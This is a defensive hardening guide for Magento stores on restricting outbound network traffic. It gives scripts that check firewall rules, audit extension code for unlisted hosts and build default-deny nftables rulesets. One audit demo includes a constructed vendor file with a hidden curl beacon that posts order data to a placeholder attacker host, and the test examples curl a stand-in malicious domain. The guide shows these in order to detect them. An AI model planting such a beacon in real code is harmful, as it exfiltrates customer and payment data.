
Why it Matters

Magento and its extensions make outbound HTTP requests to third-party services (payment gateways, shipping APIs, email providers, Composer and update servers). If outbound traffic is unrestricted, a compromised extension, or an attacker who has obtained code execution on the web tier, can exfiltrate customer and payment data to any destination, fetch second-stage tooling, or call back to command-and-control infrastructure.

Enforcing an outbound allow-list ensures that only approved domains and services are reachable from production servers, which limits data leakage and cuts off command-and-control callbacks. It also turns every blocked connection attempt into a high-signal detection event, because a production store has no legitimate reason to contact a host that is not on the list.

Verification Steps

Network policy check

# Review firewall or egress rules (run on the web/PHP hosts themselves)
iptables -L OUTPUT -n -v        # -n avoids reverse DNS lookups, -v shows packet counters
ufw status verbose              # plain "ufw status" does not print the default outgoing policy

# Expected: OUTPUT policy DROP/REJECT (or a final DROP/REJECT rule), ACCEPT rules
# scoped to specific destinations, and "deny (outgoing)" in the ufw defaults.
# Note: ufw ships with "allow (outgoing)" as its default, so an untouched install fails.
# On cloud hosts, review the security group / network ACL egress rules as well.
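The listing above has to be read by eye. The script below is an added example, not part of the baseline page or of any Magento tooling: it grades an `iptables-save` dump (easier to parse than `iptables -L`) for the two properties that matter, a default-deny on the OUTPUT chain and ACCEPT rules that each name a destination. The three dumps are constructed samples; the resolver address 10.0.0.53 and gateway address 203.0.113.10 are placeholders. The middle sample shows a common trap: a DROP policy that still allows TCP 443 to anywhere is not an allow-list, since an attacker's HTTPS collector is as reachable as the payment gateway.

```sh
#!/bin/sh
# Added example, not part of the baseline page: grade an iptables-save dump for an
# egress allow-list posture. On a real host run:
#   check_egress_posture "$(sudo iptables-save -t filter)"
# The three dumps below are constructed samples, not captured from a real system.

PERMISSIVE_DUMP='*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
COMMIT'

# Looks restricted (policy DROP) but lets the host reach port 443 anywhere.
PORT_ONLY_DUMP='*filter
:OUTPUT DROP [0:0]
-A OUTPUT -o lo -j ACCEPT
-A OUTPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
-A OUTPUT -p tcp --dport 443 -j ACCEPT
COMMIT'

# Default-deny with destination-scoped allows (10.0.0.53 = placeholder internal
# resolver, 203.0.113.10 = placeholder payment gateway IP) and logging of the rest.
RESTRICTED_DUMP='*filter
:OUTPUT DROP [0:0]
-A OUTPUT -o lo -j ACCEPT
-A OUTPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
-A OUTPUT -p udp -d 10.0.0.53 --dport 53 -j ACCEPT
-A OUTPUT -p tcp -d 203.0.113.10 --dport 443 -j ACCEPT
-A OUTPUT -j LOG --log-prefix "egress-denied: "
-A OUTPUT -j DROP
COMMIT'

# check_egress_posture DUMP: prints a verdict, returns 0 for PASS and 1 for FAIL.
check_egress_posture() {
    rules=$(printf '%s\n' "$1" | grep -E '^(:OUTPUT |-A OUTPUT )' || true)
    policy=$(printf '%s\n' "$rules" | awk '$1 == ":OUTPUT" { print $2 }')
    last=$(printf '%s\n' "$rules" | grep '^-A OUTPUT' | tail -n 1 \
           | sed -n 's/.* -j \([A-Z]*\).*/\1/p')
    # 1. A default-deny must exist: chain policy DROP/REJECT or a terminal DROP/REJECT rule.
    case "$policy:$last" in
        DROP:*|REJECT:*|*:DROP|*:REJECT) ;;
        *) echo "FAIL: OUTPUT policy is '${policy:-unset}' and the chain does not end in DROP/REJECT"
           return 1 ;;
    esac
    # 2. Every ACCEPT other than loopback and reply traffic must name a destination (-d).
    broad=$(printf '%s\n' "$rules" | grep -- '-j ACCEPT' \
            | grep -v -e '-o lo ' -e 'ESTABLISHED' | grep -v -- ' -d ' || true)
    if [ -n "$broad" ]; then
        echo "FAIL: ACCEPT rule(s) not scoped to a destination:"
        printf '  %s\n' "$broad"
        return 1
    fi
    echo "PASS: default-deny egress with destination-scoped allow rules"
}

# Stand-alone demo: grade the three constructed dumps.
for name in PERMISSIVE_DUMP PORT_ONLY_DUMP RESTRICTED_DUMP; do
    eval "dump=\$$name"
    printf '%s -> ' "$name"
    check_egress_posture "$dump" || true
done
```

The check is deliberately strict about `-d`: a rule that matches only on port or interface is treated as broad. Hosts managed with nftables directly can be reviewed the same way from `nft list ruleset`, looking for `policy drop` on the output chain and `daddr` on every accept.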

Magento extension audit

# Search for HTTP client usage in custom and vendor code
# (-n prints line numbers; -F takes the pattern literally so the backslash is not
# treated as an escape; -i also matches Magento's own Magento\Framework\HTTP\Client\Curl)
grep -R -n "curl_init" app/code vendor/
grep -R -n -i -F 'Http\Client' app/code vendor/

# Ensure the destination in every match is on the allow-list
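Grepping for call sites still leaves the reviewer to read every hit. The script below is an added example, not Magento's own tooling: it finds PHP files containing an outbound call-site marker, extracts the hostnames from URL literals in those files, and reports any host that is not on an allow-list file. The module tree, the hostnames `api.payments.example` and `collector.evil-example.net`, and the allow-list path are constructed for the demo; the pattern list and the function names are this example's own.

```sh
#!/bin/sh
# Added example, not Magento's own tooling: find outbound HTTP call sites in PHP,
# pull the hostnames out of URL literals, and diff them against an allow-list.
# The module tree below is constructed for the demo; in practice run
#   audit_outbound_hosts /var/www/magento /etc/magento-egress-allowlist.txt
# (paths are placeholders) from the Magento root after every deploy.

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
mkdir -p "$WORK/app/code/Acme/Payments/Gateway" "$WORK/vendor/someone/helper/src"

# A legitimate module using Magento's own client against the allow-listed gateway.
cat > "$WORK/app/code/Acme/Payments/Gateway/Client.php" <<'EOF'
<?php
namespace Acme\Payments\Gateway;
use Magento\Framework\HTTP\Client\Curl;
class Client
{
    const ENDPOINT = 'https://api.payments.example/v2/charge';
    public function charge(Curl $curl, array $payload): void
    {
        $curl->post(self::ENDPOINT, $payload);
    }
}
EOF

# A vendor package with a hidden beacon that posts order data to an unlisted host.
cat > "$WORK/vendor/someone/helper/src/Helper.php" <<'EOF'
<?php
function report_order(array $order): void
{
    $ch = curl_init('http://collector.evil-example.net/c.php');
    curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($order));
    curl_exec($ch);
}
EOF

printf 'api.payments.example\n' > "$WORK/allowlist.txt"

# Markers of an outbound call site; -i also catches Magento's HTTP\Client namespace.
CALL_PATTERNS='curl_init|curl_setopt|HTTP\\Client|GuzzleHttp|Laminas\\Http|fsockopen|stream_socket_client|file_get_contents\(.https?:'

# list_outbound_hosts DIR: unique lowercase hostnames from URL literals in files
# that contain at least one call-site marker.
list_outbound_hosts() {
    find "$1" -name '*.php' -exec grep -l -E -i "$CALL_PATTERNS" {} + 2>/dev/null \
      | while IFS= read -r f; do
            grep -h -o -E 'https?://[A-Za-z0-9.-]+' "$f" || true
        done \
      | sed -E 's#^https?://##' | tr 'A-Z' 'a-z' | sort -u
}

# audit_outbound_hosts DIR ALLOWLIST: prints hosts missing from ALLOWLIST
# (one exact hostname per line); returns 1 if any were found.
audit_outbound_hosts() {
    unlisted=$(list_outbound_hosts "$1" | grep -v -x -F -f "$2" || true)
    if [ -n "$unlisted" ]; then
        printf 'UNLISTED: %s\n' $unlisted
        return 1
    fi
    echo "all URL literals are on the allow-list"
}

# Stand-alone demo on the constructed tree.
audit_outbound_hosts "$WORK" "$WORK/allowlist.txt" || true
```

Expect Magento core and Composer itself to appear in a real run (update servers, repo.magento.com, packagist.org), which is why those sources belong on the list. The audit only sees string literals: a host assembled by concatenation, decoded from base64, or read from `core_config_data` at runtime will not show up, so treat this as a supplement to the firewall control, not a replacement for it.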

Remediation / Fix Guidance

  1. Create an outbound allow-list, resolved to the specific hosts and ports each integration needs (normally TCP 443), including only:
    • Payment providers (PayPal, Stripe, Adyen, etc.)
    • Shipping APIs (FedEx, UPS, DHL, etc.)
    • Official Magento/Packagist update sources
    • Other explicitly required integrations
  2. Block all other outbound connections at the firewall or security group level with a default-deny policy. Allow DNS only to your own resolvers, since an open DNS path is itself an exfiltration channel.
  3. Audit extensions regularly to ensure no hidden calls to untrusted domains.
  4. Log denied outbound connection attempts and alert on them; a production store should never try to reach a host outside the list, so any hit is worth investigating.
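Steps 1, 2 and 4 together, as an added example that is not part of the baseline page: the first function turns an allow-list of already-resolved IPs into a default-deny nftables ruleset that logs everything it drops with a fixed prefix; the second summarises those log lines by destination so the denials from step 4 can be reviewed or shipped to a SIEM. The resolver address, the gateway IPs, the table and set names, the log prefix and the kernel log excerpt are all constructed for the demo.

```sh
#!/bin/sh
# Added example, not part of the baseline page: generate a default-deny nftables
# egress ruleset from an allow-list of resolved IPs, log everything it denies,
# and summarise those denials from the kernel log. All addresses, names and log
# lines below are constructed for the demo.

# gen_egress_ruleset RESOLVER_IP ALLOWED_IP...: print an nft ruleset that permits
# loopback, reply traffic, DNS to one resolver and HTTPS to the allow-listed IPs,
# and logs-then-drops everything else.
gen_egress_ruleset() {
    resolver=$1; shift
    elems=$(printf '%s, ' "$@"); elems=${elems%, }
    cat <<EOF
table inet egress {
    set allowed_https {
        type ipv4_addr
        elements = { $elems }
    }
    chain output {
        type filter hook output priority 0; policy drop;
        oif "lo" accept
        ct state established,related accept
        ip daddr $resolver udp dport 53 accept
        ip daddr @allowed_https tcp dport 443 accept
        log prefix "egress-denied: " drop
    }
}
EOF
}

# Constructed kernel log excerpt in the shape the log rule above produces
# (read it from journalctl -k or /var/log/kern.log on a real host).
DENIED_LOG=$(cat <<'EOF'
Mar  3 10:15:02 web1 kernel: egress-denied: IN= OUT=eth0 SRC=10.0.1.5 DST=198.51.100.7 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=0 DF PROTO=TCP SPT=51234 DPT=443 WINDOW=64240 RES=0x00 SYN URGP=0
Mar  3 10:15:03 web1 kernel: egress-denied: IN= OUT=eth0 SRC=10.0.1.5 DST=198.51.100.7 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=0 DF PROTO=TCP SPT=51235 DPT=443 WINDOW=64240 RES=0x00 SYN URGP=0
Mar  3 10:15:04 web1 kernel: egress-denied: IN= OUT=eth0 SRC=10.0.1.5 DST=198.51.100.7 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=0 DF PROTO=TCP SPT=51236 DPT=443 WINDOW=64240 RES=0x00 SYN URGP=0
Mar  3 10:16:40 web1 kernel: egress-denied: IN= OUT=eth0 SRC=10.0.1.5 DST=203.0.113.99 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=0 DF PROTO=TCP SPT=51300 DPT=25 WINDOW=64240 RES=0x00 SYN URGP=0
Mar  3 10:16:41 web1 sshd[1234]: Accepted publickey for deploy from 10.0.0.9 port 50022
EOF
)

# summarize_denied: read kernel log lines on stdin, print "DST:DPT count",
# busiest destination first. Run as: journalctl -k | summarize_denied
summarize_denied() {
    grep 'egress-denied:' \
      | sed -n 's/.*DST=\([0-9.]*\).*DPT=\([0-9]*\).*/\1:\2/p' \
      | sort | uniq -c | sort -rn \
      | awk '{ print $2, $1 }'
}

# Stand-alone demo.
gen_egress_ruleset 10.0.0.53 203.0.113.10 203.0.113.11
printf '%s\n' "$DENIED_LOG" | summarize_denied
```

Typical use is to resolve the allow-listed hostnames and load the result, for example `gen_egress_ruleset 10.0.0.53 $(getent ahostsv4 api.paypal.com | awk '{print $1}' | sort -u) > /etc/nftables.d/egress.nft && nft -f /etc/nftables.d/egress.nft` (file path is a placeholder). Two caveats: the IP set is a snapshot, and CDN-fronted APIs change addresses, so either re-resolve on a timer or put an egress proxy that enforces hostnames in front of outbound HTTPS; and the `ip daddr` rules cover IPv4 only, so with the `inet` family all IPv6 egress is dropped by the policy unless you add a matching `ip6` set.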

Examples

Both checks should be run from the web server itself, as the user that runs PHP (www-data below is a placeholder; use whatever account runs php-fpm), because that is the context a compromised extension would have.

Fail Example
# Outbound unrestricted
$ sudo -u www-data curl -sS -I --max-time 5 http://evil.example.com
HTTP/1.1 200 OK
# Store can connect anywhere → FAIL

Pass Example
# Outbound restricted by firewall
$ sudo -u www-data curl -sS -I --max-time 5 http://evil.example.com
curl: (7) Failed to connect
# A REJECT rule gives error 7; a DROP rule gives "curl: (28) Connection timed out" instead.
# "curl: (6) Could not resolve host" means DNS was blocked; repeat the test against an
# IP literal to confirm the TCP path is blocked as well.
$ sudo -u www-data curl -sS -I --max-time 5 https://api.allowed-gateway.example
HTTP/1.1 200 OK
# (placeholder host: substitute one of your allow-listed endpoints)
# Only allow-listed domains (e.g., PayPal, UPS) reachable, and still working → PASS
